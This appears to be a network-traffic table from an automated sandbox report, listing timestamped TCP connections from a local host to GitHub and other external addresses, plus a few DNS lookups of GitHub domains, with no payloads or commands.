Oct 15, 2024 15:59:27.502993107 CEST | 49736 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:27.503025055 CEST | 443 | 49736 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:28.111358881 CEST | 443 | 49736 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:28.111505032 CEST | 49736 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:28.116127014 CEST | 49736 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:28.116152048 CEST | 443 | 49736 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:28.116564035 CEST | 443 | 49736 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:28.116636992 CEST | 49736 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:28.116956949 CEST | 49736 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:28.159415960 CEST | 443 | 49736 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:28.378253937 CEST | 443 | 49736 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:28.378423929 CEST | 49736 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:28.378456116 CEST | 443 | 49736 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:28.378505945 CEST | 49736 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:28.378513098 CEST | 443 | 49736 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:28.378552914 CEST | 49736 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:28.378559113 CEST | 443 | 49736 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:28.378597975 CEST | 49736 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:28.378603935 CEST | 443 | 49736 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:28.378643036 CEST | 49736 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:28.378648996 CEST | 443 | 49736 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:28.378685951 CEST | 49736 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:28.378711939 CEST | 443 | 49736 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:28.378757954 CEST | 49736 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:28.379123926 CEST | 443 | 49736 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:28.379179955 CEST | 49736 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:28.379200935 CEST | 443 | 49736 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:28.379255056 CEST | 49736 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:28.379271984 CEST | 443 | 49736 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:28.379319906 CEST | 49736 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:28.494859934 CEST | 443 | 49736 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:28.494906902 CEST | 443 | 49736 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:28.494930029 CEST | 443 | 49736 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:28.494951010 CEST | 443 | 49736 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:28.494956970 CEST | 49736 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:28.494957924 CEST | 49736 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:28.495026112 CEST | 443 | 49736 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:28.495073080 CEST | 49736 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:28.495073080 CEST | 49736 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:28.495073080 CEST | 49736 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:28.495311022 CEST | 443 | 49736 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:28.495471001 CEST | 49736 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:28.495776892 CEST | 443 | 49736 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:28.495810032 CEST | 443 | 49736 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:28.495831013 CEST | 443 | 49736 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:28.495851994 CEST | 49736 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:28.495852947 CEST | 49736 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:28.495868921 CEST | 443 | 49736 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:28.495898008 CEST | 49736 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:28.495915890 CEST | 49736 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:28.496304989 CEST | 443 | 49736 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:28.496335030 CEST | 443 | 49736 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:28.496364117 CEST | 49736 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:28.496382952 CEST | 443 | 49736 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:28.496433973 CEST | 49736 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:28.496433973 CEST | 49736 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:28.496871948 CEST | 443 | 49736 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:28.496911049 CEST | 443 | 49736 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:28.496932030 CEST | 49736 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:28.496949911 CEST | 443 | 49736 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:28.496972084 CEST | 49736 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:28.496994019 CEST | 443 | 49736 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:28.496998072 CEST | 49736 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:28.497009993 CEST | 443 | 49736 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:28.497037888 CEST | 49736 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:28.497073889 CEST | 49736 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:28.497751951 CEST | 443 | 49736 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:28.497813940 CEST | 49736 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:28.498040915 CEST | 443 | 49736 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:28.498102903 CEST | 49736 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:28.498109102 CEST | 443 | 49736 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:28.498142958 CEST | 49736 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:28.498162985 CEST | 443 | 49736 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:28.498186111 CEST | 49736 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:28.498186111 CEST | 49736 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:28.498231888 CEST | 49736 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:32.556874990 CEST | 49737 | 80 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:32.562951088 CEST | 80 | 49737 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:32.563098907 CEST | 49737 | 80 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:32.567075014 CEST | 49737 | 80 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:32.572308064 CEST | 80 | 49737 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:33.161463976 CEST | 80 | 49737 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:33.162583113 CEST | 80 | 49737 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:33.162678003 CEST | 49737 | 80 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:33.164560080 CEST | 49737 | 80 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:33.168668985 CEST | 49738 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:33.168720961 CEST | 443 | 49738 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:33.168804884 CEST | 49738 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:33.169589996 CEST | 80 | 49737 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:33.189291000 CEST | 49738 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:33.189311981 CEST | 443 | 49738 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:33.793499947 CEST | 443 | 49738 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:33.793605089 CEST | 49738 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:33.797123909 CEST | 49738 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:33.797143936 CEST | 443 | 49738 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:33.797391891 CEST | 443 | 49738 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:33.804722071 CEST | 49738 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:33.851408005 CEST | 443 | 49738 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:34.019408941 CEST | 443 | 49738 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:34.019592047 CEST | 443 | 49738 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:34.019671917 CEST | 49738 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:34.019686937 CEST | 443 | 49738 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:34.019717932 CEST | 443 | 49738 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:34.019921064 CEST | 49738 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:34.019934893 CEST | 443 | 49738 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:34.020311117 CEST | 443 | 49738 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:34.020390034 CEST | 49738 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:34.020395041 CEST | 443 | 49738 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:34.026724100 CEST | 443 | 49738 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:34.026786089 CEST | 49738 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:34.059607029 CEST | 49738 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:51.587723970 CEST | 49740 | 80 | 192.168.2.4 | 172.67.19.24
Oct 15, 2024 15:59:51.592716932 CEST | 80 | 49740 | 172.67.19.24 | 192.168.2.4
Oct 15, 2024 15:59:51.592807055 CEST | 49740 | 80 | 192.168.2.4 | 172.67.19.24
Oct 15, 2024 15:59:51.594091892 CEST | 49740 | 80 | 192.168.2.4 | 172.67.19.24
Oct 15, 2024 15:59:51.598906040 CEST | 80 | 49740 | 172.67.19.24 | 192.168.2.4
Oct 15, 2024 15:59:52.218569040 CEST | 80 | 49740 | 172.67.19.24 | 192.168.2.4
Oct 15, 2024 15:59:52.220833063 CEST | 49741 | 443 | 192.168.2.4 | 172.67.19.24
Oct 15, 2024 15:59:52.220880032 CEST | 443 | 49741 | 172.67.19.24 | 192.168.2.4
Oct 15, 2024 15:59:52.221002102 CEST | 49741 | 443 | 192.168.2.4 | 172.67.19.24
Oct 15, 2024 15:59:52.224267960 CEST | 49741 | 443 | 192.168.2.4 | 172.67.19.24
Oct 15, 2024 15:59:52.224289894 CEST | 443 | 49741 | 172.67.19.24 | 192.168.2.4
Oct 15, 2024 15:59:52.269485950 CEST | 49740 | 80 | 192.168.2.4 | 172.67.19.24
Oct 15, 2024 15:59:52.462208986 CEST | 49742 | 443 | 192.168.2.4 | 162.159.138.232
Oct 15, 2024 15:59:52.462254047 CEST | 443 | 49742 | 162.159.138.232 | 192.168.2.4
Oct 15, 2024 15:59:52.462352991 CEST | 49742 | 443 | 192.168.2.4 | 162.159.138.232
Oct 15, 2024 15:59:52.462755919 CEST | 49742 | 443 | 192.168.2.4 | 162.159.138.232
Oct 15, 2024 15:59:52.462771893 CEST | 443 | 49742 | 162.159.138.232 | 192.168.2.4
Oct 15, 2024 15:59:52.850522041 CEST | 443 | 49741 | 172.67.19.24 | 192.168.2.4
Oct 15, 2024 15:59:52.850593090 CEST | 49741 | 443 | 192.168.2.4 | 172.67.19.24
Oct 15, 2024 15:59:52.906348944 CEST | 49741 | 443 | 192.168.2.4 | 172.67.19.24
Oct 15, 2024 15:59:52.906372070 CEST | 443 | 49741 | 172.67.19.24 | 192.168.2.4
Oct 15, 2024 15:59:52.907443047 CEST | 443 | 49741 | 172.67.19.24 | 192.168.2.4
Oct 15, 2024 15:59:52.915921926 CEST | 49741 | 443 | 192.168.2.4 | 172.67.19.24
Oct 15, 2024 15:59:52.963404894 CEST | 443 | 49741 | 172.67.19.24 | 192.168.2.4
Oct 15, 2024 15:59:53.065481901 CEST | 443 | 49741 | 172.67.19.24 | 192.168.2.4
Oct 15, 2024 15:59:53.065687895 CEST | 443 | 49741 | 172.67.19.24 | 192.168.2.4
Oct 15, 2024 15:59:53.065747976 CEST | 49741 | 443 | 192.168.2.4 | 172.67.19.24
Oct 15, 2024 15:59:53.078800917 CEST | 49741 | 443 | 192.168.2.4 | 172.67.19.24
Oct 15, 2024 15:59:53.087169886 CEST | 443 | 49742 | 162.159.138.232 | 192.168.2.4
Oct 15, 2024 15:59:53.087363958 CEST | 49742 | 443 | 192.168.2.4 | 162.159.138.232
Oct 15, 2024 15:59:53.096556902 CEST | 49742 | 443 | 192.168.2.4 | 162.159.138.232
Oct 15, 2024 15:59:53.096591949 CEST | 443 | 49742 | 162.159.138.232 | 192.168.2.4
Oct 15, 2024 15:59:53.096872091 CEST | 443 | 49742 | 162.159.138.232 | 192.168.2.4
Oct 15, 2024 15:59:53.097835064 CEST | 49742 | 443 | 192.168.2.4 | 162.159.138.232
Oct 15, 2024 15:59:53.101108074 CEST | 49743 | 80 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:53.106235027 CEST | 80 | 49743 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:53.106370926 CEST | 49743 | 80 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:53.106467962 CEST | 49743 | 80 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:53.112478971 CEST | 80 | 49743 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:53.143407106 CEST | 443 | 49742 | 162.159.138.232 | 192.168.2.4
Oct 15, 2024 15:59:53.143485069 CEST | 49742 | 443 | 192.168.2.4 | 162.159.138.232
Oct 15, 2024 15:59:53.143513918 CEST | 443 | 49742 | 162.159.138.232 | 192.168.2.4
Oct 15, 2024 15:59:53.332061052 CEST | 443 | 49742 | 162.159.138.232 | 192.168.2.4
Oct 15, 2024 15:59:53.332314014 CEST | 443 | 49742 | 162.159.138.232 | 192.168.2.4
Oct 15, 2024 15:59:53.332376003 CEST | 49742 | 443 | 192.168.2.4 | 162.159.138.232
Oct 15, 2024 15:59:53.340082884 CEST | 49742 | 443 | 192.168.2.4 | 162.159.138.232
Oct 15, 2024 15:59:53.728348970 CEST | 80 | 49743 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:53.728595018 CEST | 49743 | 80 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:53.729465008 CEST | 80 | 49743 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:53.729530096 CEST | 49743 | 80 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:53.729772091 CEST | 49744 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:53.729832888 CEST | 443 | 49744 | 185.199.109.133 | 192.168.2.4
                                                                      Oct 15, 2024 15:59:53.729976892 CEST49744443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:53.730252028 CEST49744443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:53.730274916 CEST44349744185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:53.733501911 CEST8049743185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:54.350431919 CEST44349744185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:54.350835085 CEST49744443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:54.352478981 CEST49744443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:54.352493048 CEST44349744185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:54.352855921 CEST44349744185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:54.354082108 CEST49744443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:54.395420074 CEST44349744185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:54.704293013 CEST44349744185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:54.704463005 CEST44349744185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:54.704529047 CEST44349744185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:54.704598904 CEST49744443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:54.704602003 CEST44349744185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:54.704629898 CEST44349744185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:54.704704046 CEST49744443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:54.704713106 CEST44349744185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:54.704751968 CEST49744443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:54.704765081 CEST44349744185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:54.704902887 CEST44349744185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:54.704969883 CEST49744443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:54.782630920 CEST49744443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:59.514312983 CEST4974580192.168.2.4172.67.19.24
                                                                      Oct 15, 2024 15:59:59.900897980 CEST8049745172.67.19.24192.168.2.4
                                                                      Oct 15, 2024 15:59:59.900980949 CEST4974580192.168.2.4172.67.19.24
                                                                      Oct 15, 2024 15:59:59.908361912 CEST4974580192.168.2.4172.67.19.24
                                                                      Oct 15, 2024 15:59:59.913317919 CEST8049745172.67.19.24192.168.2.4
                                                                      Oct 15, 2024 16:00:00.529232025 CEST8049745172.67.19.24192.168.2.4
                                                                      Oct 15, 2024 16:00:00.531366110 CEST49746443192.168.2.4172.67.19.24
                                                                      Oct 15, 2024 16:00:00.531409979 CEST44349746172.67.19.24192.168.2.4
                                                                      Oct 15, 2024 16:00:00.531662941 CEST49746443192.168.2.4172.67.19.24
                                                                      Oct 15, 2024 16:00:00.534446955 CEST49746443192.168.2.4172.67.19.24
                                                                      Oct 15, 2024 16:00:00.534461975 CEST44349746172.67.19.24192.168.2.4
                                                                      Oct 15, 2024 16:00:00.582048893 CEST4974580192.168.2.4172.67.19.24
                                                                      Oct 15, 2024 16:00:01.156943083 CEST44349746172.67.19.24192.168.2.4
                                                                      Oct 15, 2024 16:00:01.157072067 CEST49746443192.168.2.4172.67.19.24
                                                                      Oct 15, 2024 16:00:01.158679962 CEST49746443192.168.2.4172.67.19.24
                                                                      Oct 15, 2024 16:00:01.158687115 CEST44349746172.67.19.24192.168.2.4
                                                                      Oct 15, 2024 16:00:01.159535885 CEST44349746172.67.19.24192.168.2.4
                                                                      Oct 15, 2024 16:00:01.166265011 CEST49746443192.168.2.4172.67.19.24
                                                                      Oct 15, 2024 16:00:01.211402893 CEST44349746172.67.19.24192.168.2.4
                                                                      Oct 15, 2024 16:00:01.312302113 CEST44349746172.67.19.24192.168.2.4
                                                                      Oct 15, 2024 16:00:01.312611103 CEST44349746172.67.19.24192.168.2.4
                                                                      Oct 15, 2024 16:00:01.312707901 CEST49746443192.168.2.4172.67.19.24
                                                                      Oct 15, 2024 16:00:01.325257063 CEST49746443192.168.2.4172.67.19.24
                                                                      Oct 15, 2024 16:00:01.340539932 CEST4974780192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 16:00:01.346590996 CEST8049747185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 16:00:01.348048925 CEST4974780192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 16:00:01.348216057 CEST4974780192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 16:00:01.354441881 CEST8049747185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 16:00:02.198314905 CEST8049747185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 16:00:02.198364019 CEST8049747185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 16:00:02.198429108 CEST8049747185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 16:00:02.198436975 CEST4974780192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 16:00:02.198473930 CEST4974780192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 16:00:02.198637009 CEST4974780192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 16:00:02.199790955 CEST49748443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 16:00:02.199824095 CEST44349748185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 16:00:02.199918985 CEST49748443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 16:00:02.200186968 CEST49748443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 16:00:02.200200081 CEST44349748185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 16:00:02.209184885 CEST8049747185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 16:00:02.810569048 CEST44349748185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 16:00:02.810664892 CEST49748443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 16:00:02.909914970 CEST49748443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 16:00:02.909946918 CEST44349748185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 16:00:02.910934925 CEST44349748185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 16:00:02.946649075 CEST49748443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 16:00:02.991410017 CEST44349748185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 16:00:03.071736097 CEST44349748185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 16:00:03.071938038 CEST44349748185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 16:00:03.071995974 CEST49748443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 16:00:03.072010040 CEST44349748185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 16:00:03.072102070 CEST44349748185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 16:00:03.072149992 CEST49748443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 16:00:03.072159052 CEST44349748185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 16:00:03.072242022 CEST44349748185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 16:00:03.072288036 CEST49748443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 16:00:03.072293997 CEST44349748185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 16:00:03.078412056 CEST44349748185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 16:00:03.078469992 CEST49748443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 16:00:03.143800020 CEST49748443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 16:00:07.621099949 CEST49749443192.168.2.4162.159.138.232
                                                                      Oct 15, 2024 16:00:07.621149063 CEST44349749162.159.138.232192.168.2.4
                                                                      Oct 15, 2024 16:00:07.621341944 CEST49749443192.168.2.4162.159.138.232
                                                                      Oct 15, 2024 16:00:07.621773005 CEST49749443192.168.2.4162.159.138.232
                                                                      Oct 15, 2024 16:00:07.621787071 CEST44349749162.159.138.232192.168.2.4
                                                                      Oct 15, 2024 16:00:08.231175900 CEST44349749162.159.138.232192.168.2.4
                                                                      Oct 15, 2024 16:00:08.231409073 CEST49749443192.168.2.4162.159.138.232
                                                                      Oct 15, 2024 16:00:08.232790947 CEST49749443192.168.2.4162.159.138.232
                                                                      Oct 15, 2024 16:00:08.232805967 CEST44349749162.159.138.232192.168.2.4
                                                                      Oct 15, 2024 16:00:08.233053923 CEST44349749162.159.138.232192.168.2.4
                                                                      Oct 15, 2024 16:00:08.233906984 CEST49749443192.168.2.4162.159.138.232
                                                                      Oct 15, 2024 16:00:08.279407978 CEST44349749162.159.138.232192.168.2.4
                                                                      Oct 15, 2024 16:00:08.279481888 CEST49749443192.168.2.4162.159.138.232
                                                                      Oct 15, 2024 16:00:08.279505014 CEST44349749162.159.138.232192.168.2.4
                                                                      Oct 15, 2024 16:00:08.497196913 CEST44349749162.159.138.232192.168.2.4
                                                                      Oct 15, 2024 16:00:08.497406006 CEST44349749162.159.138.232192.168.2.4
                                                                      Oct 15, 2024 16:00:08.497471094 CEST49749443192.168.2.4162.159.138.232
                                                                      Oct 15, 2024 16:00:08.500015020 CEST49749443192.168.2.4162.159.138.232
                                                                      Oct 15, 2024 16:00:13.527084112 CEST4974080192.168.2.4172.67.19.24
                                                                      Oct 15, 2024 16:00:15.465471983 CEST49763443192.168.2.4162.159.138.232
                                                                      Oct 15, 2024 16:00:15.465519905 CEST44349763162.159.138.232192.168.2.4
                                                                      Oct 15, 2024 16:00:15.465607882 CEST49763443192.168.2.4162.159.138.232
                                                                      Oct 15, 2024 16:00:15.466248989 CEST49763443192.168.2.4162.159.138.232
                                                                      Oct 15, 2024 16:00:15.466265917 CEST44349763162.159.138.232192.168.2.4
                                                                      Oct 15, 2024 16:00:16.082010031 CEST44349763162.159.138.232192.168.2.4
                                                                      Oct 15, 2024 16:00:16.082103014 CEST49763443192.168.2.4162.159.138.232
                                                                      Oct 15, 2024 16:00:16.083828926 CEST49763443192.168.2.4162.159.138.232
                                                                      Oct 15, 2024 16:00:16.083843946 CEST44349763162.159.138.232192.168.2.4
                                                                      Oct 15, 2024 16:00:16.084328890 CEST44349763162.159.138.232192.168.2.4
                                                                      Oct 15, 2024 16:00:16.091759920 CEST49763443192.168.2.4162.159.138.232
                                                                      Oct 15, 2024 16:00:16.139405012 CEST44349763162.159.138.232192.168.2.4
                                                                      Oct 15, 2024 16:00:16.139491081 CEST49763443192.168.2.4162.159.138.232
                                                                      Oct 15, 2024 16:00:16.139503956 CEST44349763162.159.138.232192.168.2.4
                                                                      Oct 15, 2024 16:00:16.360263109 CEST44349763162.159.138.232192.168.2.4
                                                                      Oct 15, 2024 16:00:16.360369921 CEST44349763162.159.138.232192.168.2.4
                                                                      Oct 15, 2024 16:00:16.360501051 CEST49763443192.168.2.4162.159.138.232
                                                                      Oct 15, 2024 16:00:16.362966061 CEST49763443192.168.2.4162.159.138.232
                                                                      Oct 15, 2024 16:00:21.398005009 CEST4974580192.168.2.4172.67.19.24
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 15, 2024 15:59:26.032682896 CEST | 56469 | 53 | 192.168.2.4 | 1.1.1.1
Oct 15, 2024 15:59:26.040072918 CEST | 53 | 56469 | 1.1.1.1 | 192.168.2.4
Oct 15, 2024 15:59:27.494472027 CEST | 56654 | 53 | 192.168.2.4 | 1.1.1.1
Oct 15, 2024 15:59:27.501832962 CEST | 53 | 56654 | 1.1.1.1 | 192.168.2.4
Oct 15, 2024 15:59:32.538417101 CEST | 50729 | 53 | 192.168.2.4 | 1.1.1.1
Oct 15, 2024 15:59:32.546056032 CEST | 53 | 50729 | 1.1.1.1 | 192.168.2.4
Oct 15, 2024 15:59:51.573410988 CEST | 64968 | 53 | 192.168.2.4 | 1.1.1.1
Oct 15, 2024 15:59:51.581504107 CEST | 53 | 64968 | 1.1.1.1 | 192.168.2.4
Oct 15, 2024 15:59:52.453298092 CEST | 60248 | 53 | 192.168.2.4 | 1.1.1.1
Oct 15, 2024 15:59:52.461483955 CEST | 53 | 60248 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 15, 2024 15:59:26.032682896 CEST | 192.168.2.4 | 1.1.1.1 | 0xb720 | Standard query (0) | github.com | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:59:27.494472027 CEST | 192.168.2.4 | 1.1.1.1 | 0xc429 | Standard query (0) | objects.githubusercontent.com | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:59:32.538417101 CEST | 192.168.2.4 | 1.1.1.1 | 0x9092 | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001) | false
